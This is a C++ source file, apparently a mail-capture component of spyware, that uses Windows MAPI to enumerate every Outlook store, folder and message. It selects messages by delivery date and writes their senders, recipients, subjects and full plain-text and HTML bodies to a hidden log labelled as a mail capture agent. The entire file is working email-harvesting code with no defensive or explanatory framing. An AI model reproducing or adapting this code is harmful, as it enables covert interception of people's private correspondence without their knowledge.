#include <windows.h>
#include <list>
#include "mapi_utils.h"
using namespace std;
#include "LOG.h"
#include "common.h"

// XXX Da modificare
bool IsInterestingMail(SYSTEMTIME *st)
{
	if (st->wYear == 2006 && st->wMonth == 2)
		return TRUE;
	else
		return FALSE;
}

// Stampa il contenuto del messaggio
bool OpenMessage(IMessage *imsg, const char *msg_info)
{
	bool AvailableOffline=false;
	SizedSPropTagArray(8, mcols) = {8,
        {PR_MESSAGE_CLASS, PR_SENDER_NAME, PR_SENDER_EMAIL_ADDRESS, PR_RTF_IN_SYNC,
         PR_RECEIVED_BY_EMAIL_ADDRESS, PR_RECEIVED_BY_NAME, PR_RECEIVED_BY_ENTRYID, PR_TRANSPORT_MESSAGE_HEADERS}};
	ULONG pcount; SPropValue *props=0; HRESULT hr;
	hr = imsg->GetProps((SPropTagArray*)&mcols,0,&pcount,&props);

	if (hr==MAPI_E_NO_ACCESS) AvailableOffline=false;
	bool okay=true;
	if (hr!=S_OK && hr!=MAPI_W_ERRORS_RETURNED) okay=false;
	if (okay && props[0].ulPropTag!=PR_MESSAGE_CLASS) okay=false;
	if (okay && (strncmp(props[0].Value.lpszA,"IPM.Note",8)!=0 && strncmp(props[0].Value.lpszA,"IPF.Note",8)!=0)) okay=false;
	if (!okay) {if (props!=0) pMAPIFreeBuffer(props); return false; }

	bool isrcvd = false;
	if (props[4].ulPropTag==PR_RECEIVED_BY_EMAIL_ADDRESS) isrcvd=true;
	if (props[5].ulPropTag==PR_RECEIVED_BY_NAME) isrcvd=true;
	if (props[6].ulPropTag==PR_RECEIVED_BY_ENTRYID) isrcvd=true;
	if (props[7].ulPropTag==PR_TRANSPORT_MESSAGE_HEADERS) isrcvd=true;

	string from;
	if (props[1].ulPropTag==PR_SENDER_NAME) from=props[1].Value.lpszA;
	if (props[2].ulPropTag==PR_SENDER_EMAIL_ADDRESS) { 
		if (from!="") from+=" ";
		from += string("<")+props[2].Value.lpszA+">";
	}
	if (from!="") AvailableOffline = true;

	string to;
	IMAPITable *rtable;
	hr = imsg->GetRecipientTable(0,&rtable);
	if (hr==S_OK) { 
		SizedSPropTagArray(3,rcols) = {3, {PR_DISPLAY_NAME,PR_EMAIL_ADDRESS,PR_RECIPIENT_TYPE} };
		SRowSet *rrows;
		hr = pHrQueryAllRows(rtable,(SPropTagArray*)&rcols,NULL,NULL,0,&rrows);
		if (hr==S_OK) { 
			for (unsigned int r=0; r<rrows->cRows; r++) { 
				string recipient;
				if (rrows->aRow[r].lpProps[0].ulPropTag==PR_DISPLAY_NAME) recipient=rrows->aRow[r].lpProps[0].Value.lpszA;
				if (rrows->aRow[r].lpProps[1].ulPropTag==PR_EMAIL_ADDRESS) { 
					if (recipient!="") recipient+=" ";
					recipient += string("<")+rrows->aRow[r].lpProps[1].Value.lpszA+">";
				}
				if (recipient!="") { 
					if (to!="") to+=", ";
					to += recipient;
				}
			}
			pFreeProws(rrows);
		}
		rtable->Release();
	}
	if (to!="") AvailableOffline = true;

	// In bodybuf prende il corpo del messaggio in plaintext
	char *bodybuf=0; unsigned int bodysize=0;
	IStream *istream;
	hr = imsg->OpenProperty(PR_BODY, &IID_IStream, STGM_READ, 0, (IUnknown**)&istream);
	if (hr==S_OK) { 
		AvailableOffline = true;
		STATSTG stg = {0};
		hr = istream->Stat(&stg,STATFLAG_NONAME);
		if (hr==S_OK) { 
			ULONG red; 

			bodysize = stg.cbSize.LowPart;
			bodybuf = new char[bodysize+1];

			hr = istream->Read(bodybuf, bodysize, &red);
			if (hr!=S_OK) 
				bodysize=0;
			else if (red<bodysize) 
				bodysize=red;

			bodybuf[bodysize]=0;
		}
		istream->Release();
	}


	// In htmlbuf prende il corpo del messaggio in HTML
	char *htmlbuf=0; unsigned int htmlsize=0;
	hr = imsg->OpenProperty(PR_BODY_HTML, &IID_IStream, STGM_READ, 0, (IUnknown**)&istream);
	if (hr==S_OK) { 
		STATSTG stg = {0};
		hr = istream->Stat(&stg,STATFLAG_NONAME);
		if (hr==S_OK) { 
			ULONG red;

			htmlsize = stg.cbSize.LowPart;
			htmlbuf = new char[htmlsize+1];
			
			hr = istream->Read(htmlbuf, htmlsize, &red);
			if (hr!=S_OK) 
				htmlsize=0;
			else if (red<htmlsize) 
				htmlsize=red;
    
			htmlbuf[htmlsize]=0;
		}
		istream->Release();
	}

	// Cerca di prendere l'html dall'RTF
	SPropValue *svmask; bool mustsync=true;
	hr = pHrGetOneProp(mapi_msgstore, PR_STORE_SUPPORT_MASK, &svmask);
	if (hr==S_OK) { 
		if ((svmask->Value.ul&STORE_RTF_OK)!=0) 
			mustsync=false;
		else if (props[3].ulPropTag==PR_RTF_IN_SYNC && props[3].Value.b!=0) 
			mustsync=false;
		pMAPIFreeBuffer(svmask);
	}

	if (mustsync) { 
		BOOL isupdated; 
		pRTFSync(imsg,RTF_SYNC_BODY_CHANGED,&isupdated);
		if (isupdated) imsg->SaveChanges(0);
	}

	hr=S_FALSE; if (htmlbuf==0) hr = imsg->OpenProperty(PR_RTF_COMPRESSED, &IID_IStream, STGM_READ, 0, (IUnknown**)&istream);
	if (hr==S_OK) { 
		AvailableOffline = true;
		IStream *iunstream; 
		pWrapCompressedRTFStream(istream,0,&iunstream);
		unsigned int bufsize=10240; htmlbuf = new char[bufsize];
		htmlsize=0; bool done=false;
		while (!done) { 
			ULONG red; 
			hr = iunstream->Read(htmlbuf+htmlsize, bufsize-htmlsize, &red);
			if (hr!=S_OK) {
				htmlbuf[htmlsize]=0; 
				done=true;
			} else {
				htmlsize+=red; done = (red < bufsize-htmlsize);
				if (!done) { 
					unsigned int newsize=2*htmlsize; char *newbuf=new char[newsize];
					memcpy(newbuf,htmlbuf,htmlsize); delete[] htmlbuf;
					htmlbuf=newbuf; bufsize=newsize;
				}
			}
		}
		htmlbuf[htmlsize]=0;
		iunstream->Release();
		istream->Release();

		if (htmlbuf!=0) { 
			if (!isrtfhtml(htmlbuf,htmlsize)) {
				delete[] htmlbuf; 
				htmlbuf=0;
			} else {
				decodertfhtml(htmlbuf,&htmlsize);
			}
		}
	}

	// Verifica la presenza di attachment
	IMAPITable *atable;
	hr = imsg->GetAttachmentTable(0,&atable);
	if (hr==S_OK) { 
		SizedSPropTagArray(3,acols) = {3, {PR_ATTACH_SIZE,PR_ATTACH_NUM,PR_ATTACH_METHOD }};
		SRowSet *arows;
		hr = pHrQueryAllRows(atable,(SPropTagArray*)&acols,NULL,NULL,0,&arows);
		if (hr==S_OK) { 
			if (arows->cRows>0) AvailableOffline = true;
			pFreeProws(arows);
		}
		atable->Release();
	}

	// Se il messaggio e' disponibile 
	if (AvailableOffline) { 
		HANDLE hf = Log_CreateFile(PM_MAILCAPAGENT, "mail");
		
		// Stampa mittente e destinatario
		if (from!="")
			Log_WriteFile(hf, (BYTE *)from.c_str(), strlen(from.c_str()));
		else
			Log_WriteFile(hf, (BYTE *)"<UNKNOWN>", strlen("<UNKNOWN>"));
		Log_WriteFile(hf, (BYTE *)" -> ", strlen(" -> "));
		if (to!="")
			Log_WriteFile(hf, (BYTE *)to.c_str(), strlen(to.c_str()));
		else
			Log_WriteFile(hf, (BYTE *)"<UNKNOWN>", strlen("<UNKNOWN>"));
		Log_WriteFile(hf, (BYTE *)"\r\n", strlen("\r\n"));

		// Dopo i recipients stampa i dettagli presi dal chiamante 
		// (in questo caso SUBJECT e TimeStamp
		Log_WriteFile(hf, (BYTE *)msg_info, strlen(msg_info));
		if (isrcvd)
			Log_WriteFile(hf, (BYTE *)" - [RECV]\r\n\r\n", strlen(" - [RECV]\r\n\r\n"));
		else
			Log_WriteFile(hf, (BYTE *)" - [SENT]\r\n\r\n", strlen(" - [SENT]\r\n\r\n"));

		// Stampa i body
		if (bodybuf) {
			Log_WriteFile(hf, (BYTE *)bodybuf, strlen(bodybuf));
			Log_WriteFile(hf, (BYTE *)"\r\n\r\n", strlen("\r\n\r\n"));
		}

		if (htmlbuf) 
			Log_WriteFile(hf, (BYTE *)htmlbuf, strlen(htmlbuf));

		Log_CloseFile(hf);
	}

	if (bodybuf!=0) delete[] bodybuf;
	if (htmlbuf!=0) delete[] htmlbuf;
	pMAPIFreeBuffer(props);

	return AvailableOffline;
}



void EnumMessages(IMAPIFolder *ifolder)
{
	bool interesting_mail;
	IMAPITable *contents;
	HRESULT hr = ifolder->GetContentsTable(0,&contents);
	if (hr==S_OK) { 
		SizedSPropTagArray(4,foldcols) = {4, {PR_ENTRYID,PR_SUBJECT,PR_SENT_REPRESENTING_NAME,PR_MESSAGE_DELIVERY_TIME} };
		SRowSet *frows;
		hr = pHrQueryAllRows(contents,(SPropTagArray*)&foldcols,NULL,NULL,0,&frows);
		if (hr==S_OK) { 
			for (unsigned int m=0; m<frows->cRows; m++) { 
				mapi_TEntryid eid; string subj,sndr,date;
				interesting_mail = false;

				// XXX Recupero i campi indispensabili (PR_ENTRYID, PR_MESSAGE_DELIVERY_TIME, PR_SUBJECT)
				// e poi quelli che mi servono per decretare i criteri di "interessantezza"
				// (in questo caso PR_SENT_REPRESENTING_NAME)
				// XXX I campi che non mi interessano posso leggerli dentro la OpenMessage 
				// (alleggerisco o elimino message_details)
				if (frows->aRow[m].lpProps[0].ulPropTag==PR_ENTRYID) eid=&frows->aRow[m].lpProps[0];
				if (frows->aRow[m].lpProps[1].ulPropTag==PR_SUBJECT) subj=frows->aRow[m].lpProps[1].Value.lpszA;
				if (frows->aRow[m].lpProps[2].ulPropTag==PR_SENT_REPRESENTING_NAME) sndr=frows->aRow[m].lpProps[2].Value.lpszA;
				if (frows->aRow[m].lpProps[3].ulPropTag==PR_MESSAGE_DELIVERY_TIME) { 
					FILETIME ft; FileTimeToLocalFileTime(&frows->aRow[m].lpProps[3].Value.ft, &ft); // Translate from UTC to current timezone
					SYSTEMTIME st; FileTimeToSystemTime(&ft,&st);

					// XXX Deve decidere se una mail e' interessante
					interesting_mail = IsInterestingMail(&st);

					const char *days[] = {"Sun ","Mon ","Tue ","Wed ","Thu ","Fri ","Sat "};
					const char *day=0; if (st.wDayOfWeek<=6) day=days[st.wDayOfWeek];
					const char *months[] = {"","Jan ","Feb ","Mar ","Apr ","May ","Jun ","Jul ","Aug ","Sep ","Oct ","Nov ","Dec "};
					const char *month=0; if (st.wMonth>=1 && st.wMonth<=12) month=months[st.wMonth];
					char c[20]; wsprintf(c,"%s%i %s%i",day,st.wDay,month,st.wYear); date=c;
				}

				// XXX Qui ho gia' una serie di info sul messaggio se volessi
				// avere una lista completa senza i "body"
				string message_details = subj+" - "+date;

				// Se il messaggio rispetta i criteri di "interessantezza"
				if (!eid.isempty() && interesting_mail) { 
					IMessage *imsg; ULONG msgtype;
					hr = ifolder->OpenEntry(eid.size, eid.ab, NULL, 0, &msgtype, (IUnknown**)&imsg);
					if (hr==S_OK) { 
						// Apre il messaggio vero e proprio
						if (msgtype==MAPI_MESSAGE) 
							OpenMessage(imsg, message_details.c_str());
						imsg->Release();
					}
				}
			}
			pFreeProws(frows);
		}
		contents->Release();
	}
}

void EnumFolders(string profile, string storename)
{
	HWND hwnd=0;

	mapi_EnsureFolders(hwnd,profile,storename);
	for (list<mapi_TFolderInfo>::const_iterator i=mapi_Folders.begin(); i!=mapi_Folders.end(); i++) { 
		IMAPIFolder *ifolder; 
		ULONG ftype;
		HRESULT hr = mapi_msgstore->OpenEntry(i->eid.size,i->eid.ab, NULL,0,&ftype,(IUnknown**)&ifolder);

		if (hr==S_OK) { 
			if (ftype==MAPI_FOLDER) { 
				ULONG num_messages=0;
				IMAPITable *contents;
				HRESULT hr = ifolder->GetContentsTable(0,&contents);
				if (hr==S_OK) { 
					contents->GetRowCount(0,&num_messages); 
					contents->Release();
					if (num_messages>0) {
						//i->name; e' il nome del folder
						EnumMessages(ifolder);
					}
				}
			}
			ifolder->Release();
		}
	}
}

void GrabMailStore()
{
	// Cicla tutti gli store
	mapi_EnsureLibraries();
	if (mapi_Libraries.size()>0) { 
		mapi_EnsureStores(mapi_Libraries.front().path);
		for (list<mapi_TStoreInfo>::const_iterator j=mapi_Stores.begin(); j!=mapi_Stores.end(); j++) { 
			if (j->type==mstStore) {
				EnumFolders(j->profile, j->store);
			}
		}
	}
	mapi_EnsureFinished();
}

